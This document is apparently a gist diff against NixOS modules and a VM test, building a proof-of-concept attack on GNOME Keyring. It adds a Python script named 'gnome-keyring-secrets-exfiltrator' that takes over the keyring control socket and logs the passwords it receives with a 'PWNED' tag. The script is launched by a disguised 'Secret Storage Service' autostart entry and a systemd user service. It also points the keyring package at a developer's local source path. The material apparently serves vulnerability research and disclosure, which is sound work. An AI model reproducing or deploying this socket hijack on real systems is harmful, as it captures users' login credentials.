+ # services.gnome.gnome-online-miners.enable = true;
+ # services.gnome.tracker-miners.enable = mkDefault true;
+ # services.gnome.tracker.enable = mkDefault true;
+ # services.hardware.bolt.enable = mkDefault true;
# TODO: Enable once #177946 is resolved
# services.packagekit.enable = mkDefault true;
services.udisks2.enable = true;
@@ -321,11 +321,11 @@ in
services.colord.enable = mkDefault true;
services.gnome.glib-networking.enable = true;
- services.gnome.gnome-browser-connector.enable = mkDefault true;
- services.gnome.gnome-initial-setup.enable = mkDefault true;
- services.gnome.gnome-remote-desktop.enable = mkDefault true;
+ # services.gnome.gnome-browser-connector.enable = mkDefault true;
+ # services.gnome.gnome-initial-setup.enable = mkDefault true;
+ # services.gnome.gnome-remote-desktop.enable = mkDefault true;
services.gnome.gnome-settings-daemon.enable = true;
- services.gnome.gnome-user-share.enable = mkDefault true;
+ # services.gnome.gnome-user-share.enable = mkDefault true;
services.gnome.rygel.enable = mkDefault true;
services.gvfs.enable = true;
services.system-config-printer.enable = (lib.mkIf config.services.printing.enable (mkDefault true));
@@ -380,7 +380,7 @@ in
gnome-color-manager
gnome-control-center
gnome-shell-extensions
- pkgs.gnome-tour # GNOME Shell detects the .desktop file on first log-in.
+ # pkgs.gnome-tour # GNOME Shell detects the .desktop file on first log-in.
pkgs.gnome-user-docs
pkgs.orca
pkgs.glib # for gsettings program
diff --git a/nixos/modules/services/x11/display-managers/gdm.nix b/nixos/modules/services/x11/display-managers/gdm.nix
index 6a915a3f2f09..8c36cea38e30 100644
--- a/nixos/modules/services/x11/display-managers/gdm.nix
+++ b/nixos/modules/services/x11/display-managers/gdm.nix
@@ -313,7 +313,7 @@ in
auth required pam_succeed_if.so uid >= 1000 quiet
${lib.optionalString pamCfg.login.enableGnomeKeyring ''
auth [success=ok default=1] ${pkgs.gnome.gdm}/lib/security/pam_gdm.so
- auth optional ${pkgs.gnome-keyring}/lib/security/pam_gnome_keyring.so
+ auth optional ${pkgs.gnome-keyring.override { enableDev = true; }}/lib/security/pam_gnome_keyring.so debug
''}
auth required pam_permit.so
@@ -337,7 +337,7 @@ in
auth required pam_env.so
${lib.optionalString pamCfg.login.enableGnomeKeyring ''
auth [success=ok default=1] ${pkgs.gnome.gdm}/lib/security/pam_gdm.so
- auth optional ${pkgs.gnome-keyring}/lib/security/pam_gnome_keyring.so
+ auth optional ${pkgs.gnome-keyring.override { enableDev = true; }}/lib/security/pam_gnome_keyring.so debug
''}
account include login
diff --git a/nixos/tests/luks.nix b/nixos/tests/luks.nix
index da1d0c63b95d..9daeeac0d3e2 100644
--- a/nixos/tests/luks.nix
+++ b/nixos/tests/luks.nix
@@ -1,8 +1,129 @@
+# Based on https://github.com/NixOS/nixpkgs/blob/553b959505b847cdbf31abe88d69c1d368f8e394/nixos/tests/luks.nix
+# and https://github.com/NixOS/nixpkgs/blob/master/nixos/tests/gnome.nix
import ./make-test-python.nix ({ lib, pkgs, ... }: {
- name = "luks";
+ name = "luks-gnome-autologin-poc";
- nodes.machine = { pkgs, ... }: {
- imports = [ ./common/auto-format-root-device.nix ];
+ nodes.machine = { pkgs, config, ... }: let
+ user = config.users.users.alice;
+
+ exfiltrator = pkgs.writeScript
+ "gnome-keyring-secrets-exfiltrator"
+ ''
+ #!${pkgs.python3.interpreter}
+ # Based on https://stackoverflow.com/a/58528177/160386
+ from pathlib import Path
+ from socketserver import UnixStreamServer, BaseRequestHandler, ThreadingMixIn
+ import os
+ import stat
+ import syslog
+
+ # Take over the control socket
+ xdg_runtime_dir = Path(os.environ.get('XDG_RUNTIME_DIR'))
+ sock_path = xdg_runtime_dir / 'keyring/control'
+ sock_path.parent.mkdir(parents=True, exist_ok=True)
+
+ sock_path.unlink(missing_ok=True)
+
+ class Handler(BaseRequestHandler):
+ def handle(self):
+ while True:
+ msg = self.request.recv(1024)
+ if msg:
+ syslog.syslog(f"PWNED: '{msg}'")
+ else:
+ return
+
+ class ThreadedUnixStreamServer(ThreadingMixIn, UnixStreamServer):
+ pass
+
+ with ThreadedUnixStreamServer(str(sock_path), Handler) as server:
+ syslog.syslog(f"Starting socket on {sock_path}")
+
+ try:
+ # Perform lstat on the path
+ file_stat = os.lstat(sock_path)
+
+ # Check if it's a socket
+ if stat.S_ISSOCK(file_stat.st_mode):
+ syslog.syslog(f"{sock_path} is a socket")
+ else:
+ syslog.syslog(f"{sock_path} is not a socket")
+
+ # Check if it's a symbolic link
+ if stat.S_ISLNK(file_stat.st_mode):
+ syslog.syslog(f"{sock_path} is a symbolic link")
+ else:
+ syslog.syslog(f"{sock_path} is not a symbolic link")
+
+ # Other checks can be performed using the `file_stat` attributes
+ # For example, check ownership
+ syslog.syslog(f"Owner UID: {file_stat.st_uid}")
+ syslog.syslog(f"File mode: {file_stat.st_mode}")
+
+ except FileNotFoundError:
+ syslog.syslog(f"{sock_path} does not exist")
+ except PermissionError:
+ syslog.syslog(f"Permission denied when accessing {sock_path}")
+ except OSError as e:
+ syslog.syslog(f"Error accessing {sock_path}: {e}")
+
+ server.serve_forever()
+ '';
+
+ exfiltratorService = pkgs.writeTextFile {
+ name = "gnome-keyring-secrets-exfiltrator.service";
+ text = ''
+ [Unit]
+ Description=gnome-keyring-secrets exfiltrator service
+
+ [Service]
+ Type=simple
+ ExecStart=${exfiltrator}
+ Restart=always
+
+ [Install]
+ WantedBy=default.target
+ '';
+ destination = "/lib/systemd/user/gnome-keyring-secrets-exfiltrator.service";
+ };
+
+ exfiltratorAutostart = pkgs.writeTextFile {
+ name = "gnome-keyring-secrets.desktop";
+ text = ''
+ [Desktop Entry]
+ Type=Application
+ Name=Secret Storage Service
+ Exec=systemctl start --user gnome-keyring-secrets-exfiltrator
+ OnlyShowIn=GNOME;Unity;MATE;
+ NoDisplay=true
+ X-GNOME-Autostart-Phase=PreDisplayServer
+ X-GNOME-AutoRestart=false
+ X-GNOME-Autostart-Notify=true
+ '';
+ };
+ in {
+ imports = [
+ ./common/auto-format-root-device.nix
+ ./common/user-account.nix
+ ];
+
+ services.xserver.enable = true;
+
+ services.xserver.displayManager = {
+ gdm.enable = true;
+ gdm.debug = true;
+ };
+
+ services.displayManager.autoLogin = {
+ enable = true;
+ user = "alice";
+ };
+
+ services.xserver.desktopManager.gnome.enable = true;
+ services.xserver.desktopManager.gnome.debug = true;
+ # Reduce size
+ services.gnome.core-utilities.enable = false;
+ programs.gnome-terminal.enable = true;
# Use systemd-boot
virtualisation = {
@@ -18,6 +139,22 @@ import ./make-test-python.nix ({ lib, pkgs, ... }: {
environment.systemPackages = with pkgs; [ cryptsetup ];
+ virtualisation.memorySize = 4096;
+
+ systemd.tmpfiles.rules = [
+ # Replaces ${pkgs.gnome-keyring}/etc/xdg/autostart/gnome-keyring-secrets.desktop
+ "d /home/alice/.config 0755 ${user.name} ${user.group} - -"
+ "d /home/alice/.config/autostart 0755 ${user.name} ${user.group} - -"
+ "L+ /home/alice/.config/autostart/gnome-keyring-secrets.desktop - - - - ${exfiltratorAutostart}"
+ ];
+
+ systemd.packages = [
+ exfiltratorService
+ ];
+
+ # Work around https://github.com/NixOS/nixpkgs/issues/81138
+ systemd.user.services.gnome-keyring-secrets-exfiltrator.wantedBy = [ "default.target" ];
+
specialisation = rec {
boot-luks.configuration = {
boot.initrd.luks.devices = lib.mkVMOverride {
@@ -27,18 +164,15 @@ import ./make-test-python.nix ({ lib, pkgs, ... }: {
};
virtualisation.rootDevice = "/dev/mapper/cryptroot";
};
- boot-luks-custom-keymap.configuration = lib.mkMerge [
- boot-luks.configuration
- {
- console.keyMap = "neo";
- }
- ];
};
};
enableOCR = true;
- testScript = ''
+ testScript = { nodes, ... }: let
+ user = nodes.machine.users.users.alice;
+ uid = toString user.uid;
+ in ''
# Create encrypted volume
machine.wait_for_unit("multi-user.target")
machine.succeed("echo -n supersecret | cryptsetup luksFormat -q --iter-time=1 /dev/vdb -")
@@ -57,17 +191,21 @@ import ./make-test-python.nix ({ lib, pkgs, ... }: {
assert "/dev/mapper/cryptroot on / type ext4" in machine.succeed("mount")
- # Boot from the encrypted disk with custom keymap
- machine.succeed("bootctl set-default nixos-generation-1-specialisation-boot-luks-custom-keymap.conf")
- machine.succeed("sync")
- machine.crash()
+ with subtest("Login to GNOME with GDM"):
+ # wait for gdm to start
+ machine.wait_for_unit("display-manager.service")
+ # wait for the wayland server
+ machine.wait_for_file("/run/user/${uid}/wayland-0")
+ # wait for alice to be logged in
+ machine.wait_for_unit("default.target", "${user.name}")
+ # check that logging in has given the user ownership of devices
+ assert "alice" in machine.succeed("getfacl -p /dev/snd/timer")
- # Boot and decrypt the disk
- machine.start()
- machine.wait_for_text("Passphrase for")
- machine.send_chars("havfkhfrkfl\n")
- machine.wait_for_unit("multi-user.target")
+ # Ignoring later messages from other gnome-keyring daemons
+ machine.fail("journalctl --grep 'PWNED(?!.+(pkcs11|ssh).x00)' > /dev/stderr")
- assert "/dev/mapper/cryptroot on / type ext4" in machine.succeed("mount")
+ # Trying to debug
+ # machine.fail("stat /run/user/1000/keyring/control > /dev/stderr")
+ machine.fail("journalctl -xea -nall > /dev/stderr")
'';
})
diff --git a/pkgs/by-name/gn/gnome-keyring/package.nix b/pkgs/by-name/gn/gnome-keyring/package.nix
index ee5b243adfc7..b81893a2b234 100644
--- a/pkgs/by-name/gn/gnome-keyring/package.nix
+++ b/pkgs/by-name/gn/gnome-keyring/package.nix
@@ -2,6 +2,8 @@
, stdenv
, fetchurl
, pkg-config
+, enableDev ? false
+, autoreconfHook
, dbus
, libgcrypt
, pam
@@ -27,10 +29,14 @@ stdenv.mkDerivation rec {
outputs = [ "out" "dev" ];
- src = fetchurl {
- url = "mirror://gnome/sources/gnome-keyring/${lib.versions.major version}/${pname}-${version}.tar.xz";
- hash = "sha256-vybJZriot/MoXsyLs+RnucIPlTW5TcRRycVZ3c/2GSU=";
- };
+ src =
+ if enableDev then
+ /home/jtojnar/Projects/gnome-keyring
+ else
+ fetchurl {
+ url = "mirror://gnome/sources/gnome-keyring/${lib.versions.major version}/${pname}-${version}.tar.xz";
+ hash = "sha256-vybJZriot/MoXsyLs+RnucIPlTW5TcRRycVZ3c/2GSU=";
+ };
nativeBuildInputs = [
pkg-config
@@ -39,6 +45,8 @@ stdenv.mkDerivation rec {
docbook-xsl-nons
docbook_xml_dtd_43
wrapGAppsHook3
+ ] ++ lib.optionals enableDev [
+ autoreconfHook
];
buildInputs = [
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment